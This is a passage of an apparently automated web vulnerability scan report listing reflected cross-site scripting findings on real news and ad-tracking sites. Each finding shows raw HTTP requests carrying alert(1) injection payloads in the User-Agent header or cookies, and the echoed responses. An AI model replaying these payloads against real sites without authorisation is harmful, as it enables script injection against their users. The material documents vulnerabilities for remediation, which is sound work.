Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /message.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b66e1"-alert(1)-"e3512dd6779
Connection: close
Cookie: lightreading%5Fvisits=2; s_cc=true; _bizo_cksm_crc32=3AF13A5B; s_sq=%5B%5BB%5D%5D; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM; seen=true;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 03:35:32 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 266679
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence
...[SNIP]...
;
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b66e1"-alert(1)-"e3512dd6779";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop20="";

/* E-commerce Variables */
s.campaign="";
s.state
...[SNIP]...

3.55. http://www.lightreading.com/messages.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lightreading.com
Path:   /messages.asp

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 665fc"-alert(1)-"80c9bede42 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /messages.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)665fc"-alert(1)-"80c9bede42
Connection: close
Cookie: lightreading%5Fvisits=2; s_cc=true; _bizo_cksm_crc32=3AF13A5B; s_sq=%5B%5BB%5D%5D; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM; seen=true;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 03:35:44 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 261914
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence
...[SNIP]...
;
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)665fc"-alert(1)-"80c9bede42";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop20="";

/* E-commerce Variables */
s.campaign="";
s.state
...[SNIP]...

3.56. http://www.lightreading.com/profile.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lightreading.com
Path:   /profile.asp

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b465"-alert(1)-"e6bbb9011e5 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profile.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9b465"-alert(1)-"e6bbb9011e5
Connection: close
Cookie: lightreading%5Fvisits=2; s_cc=true; _bizo_cksm_crc32=3AF13A5B; s_sq=%5B%5BB%5D%5D; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM; seen=true;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 03:34:22 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 174330
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence
...[SNIP]...
;
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9b465"-alert(1)-"e6bbb9011e5";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop20="";

/* E-commerce Variables */
s.campaign="";
s.state
...[SNIP]...

3.57. http://www.lightreading.com/quote.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lightreading.com
Path:   /quote.asp

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8e2f"-alert(1)-"a03bebe7bbb was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /quote.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c8e2f"-alert(1)-"a03bebe7bbb
Connection: close
Cookie: lightreading%5Fvisits=2; s_cc=true; _bizo_cksm_crc32=3AF13A5B; s_sq=%5B%5BB%5D%5D; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM; seen=true;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 03:36:22 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 227721
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence
...[SNIP]...
;
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c8e2f"-alert(1)-"a03bebe7bbb";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop20="";

/* E-commerce Variables */
s.campaign="";
s.state
...[SNIP]...

3.58. http://www.lightreading.com/register.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lightreading.com
Path:   /register.asp

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd777"-alert(1)-"1b668dadbe4 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fd777"-alert(1)-"1b668dadbe4
Connection: close
Cookie: lightreading%5Fvisits=2; s_cc=true; _bizo_cksm_crc32=3AF13A5B; s_sq=%5B%5BB%5D%5D; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM; seen=true;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 03:33:04 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 168822
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence
...[SNIP]...
;
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fd777"-alert(1)-"1b668dadbe4";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop20="";

/* E-commerce Variables */
s.campaign="";
s.state
...[SNIP]...

3.59. http://www.lightreading.com/topics.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lightreading.com
Path:   /topics.asp

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21b51"-alert(1)-"0c4cf629abb was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topics.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)21b51"-alert(1)-"0c4cf629abb
Connection: close
Cookie: lightreading%5Fvisits=2; s_cc=true; _bizo_cksm_crc32=3AF13A5B; s_sq=%5B%5BB%5D%5D; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM; seen=true;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 03:34:05 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Last-modified: Sun, 12 Dec 2010 02:34:04 GMT
Expires: Sun, 10 Apr 2011 22:34:04 GMT
Etag: s200805.p200805
Content-Length: 177166
Cache-control: max-age=10368000, public

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence
...[SNIP]...
;
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)21b51"-alert(1)-"0c4cf629abb";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop20="";

/* E-commerce Variables */
s.campaign="";
s.state
...[SNIP]...

3.60. http://www.lightreading.com/webinar.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lightreading.com
Path:   /webinar.asp

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d095"-alert(1)-"3c252500af6 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webinar.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2d095"-alert(1)-"3c252500af6
Connection: close
Cookie: lightreading%5Fvisits=2; s_cc=true; _bizo_cksm_crc32=3AF13A5B; s_sq=%5B%5BB%5D%5D; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM; seen=true;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 03:36:03 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 259308
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence
...[SNIP]...
;
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2d095"-alert(1)-"3c252500af6";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop20="";

/* E-commerce Variables */
s.campaign="";
s.state
...[SNIP]...

3.61. http://www.lightreading.com/webinar_archives.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lightreading.com
Path:   /webinar_archives.asp

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88ab2"-alert(1)-"4e0ef983f8c was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webinar_archives.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)88ab2"-alert(1)-"4e0ef983f8c
Connection: close
Cookie: lightreading%5Fvisits=2; s_cc=true; _bizo_cksm_crc32=3AF13A5B; s_sq=%5B%5BB%5D%5D; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM; seen=true;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 03:37:56 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 322048
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence
...[SNIP]...
;
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)88ab2"-alert(1)-"4e0ef983f8c";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop20="";

/* E-commerce Variables */
s.campaign="";
s.state
...[SNIP]...

3.62. http://www.lightreading.com/webinars.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lightreading.com
Path:   /webinars.asp

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73c31"-alert(1)-"daa06bb2744 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webinars.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)73c31"-alert(1)-"daa06bb2744
Connection: close
Cookie: lightreading%5Fvisits=2; s_cc=true; _bizo_cksm_crc32=3AF13A5B; s_sq=%5B%5BB%5D%5D; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM; seen=true;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 03:34:34 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 184266
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence
...[SNIP]...
;
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)73c31"-alert(1)-"daa06bb2744";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop20="";

/* E-commerce Variables */
s.campaign="";
s.state
...[SNIP]...

3.63. http://www.ondemanditgovernance.techweb.com/util/download.jhtml [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ondemanditgovernance.techweb.com
Path:   /util/download.jhtml

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 278df"-alert(1)-"66cbafd97fe was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /util/download.jhtml HTTP/1.1
Host: www.ondemanditgovernance.techweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)278df"-alert(1)-"66cbafd97fe
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 03:35:19 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 03:35:19 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=DMJCWKFBPXS05QE1GHPCKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 7195


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<
...[SNIP]...

var s_prop1="";
var s_prop2="";
var s_prop3="";
var s_prop4="";
var s_prop5="";
var s_prop6="";
var s_prop7="";
var s_prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)278df"-alert(1)-"66cbafd97fe";
var s_prop9="";
var s_prop10="";
var s_prop11="";
var s_prop12="";
var s_prop14="";
var s_prop15="";
var s_prop16="";
var s_prop19="False";

/* E-commerce Variables */
var s_campaign="";
...[SNIP]...

3.64. http://ar.voicefive.com/b/node_rcAll.pli [BMX_3PC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload ec7e2<script>alert(1)</script>cfec602e3b5 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1ec7e2<script>alert(1)</script>cfec602e3b5; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 03:23:20 GMT
Content-Type: application/x-javascript
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 03:23:20 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1006

({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "BMX_G": '0', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov
...[SNIP]...
010&prad=48493791&arc=37093140&', "UID": '177862ed-204.0.5.41-1288922372', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&', "BMX_3PC": '1ec7e2<script>alert(1)</script>cfec602e3b5', "BMX_BR": 'pid=p76910469&prad=50021&arc=521&exp=1292110859', "ar_70821733": 'exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&', "ar_p76459
...[SNIP]...

3.65. http://ar.voicefive.com/b/node_rcAll.pli [BMX_BR cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the BMX_BR cookie is copied into the HTML document as plain text between tags. The payload 64715<script>alert(1)</script>0245a6e63af was submitted in the BMX_BR cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=129211085964715<script>alert(1)</script>0245a6e63af;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 03:23:24 GMT
Content-Type: application/x-javascript
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 03:23:24 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
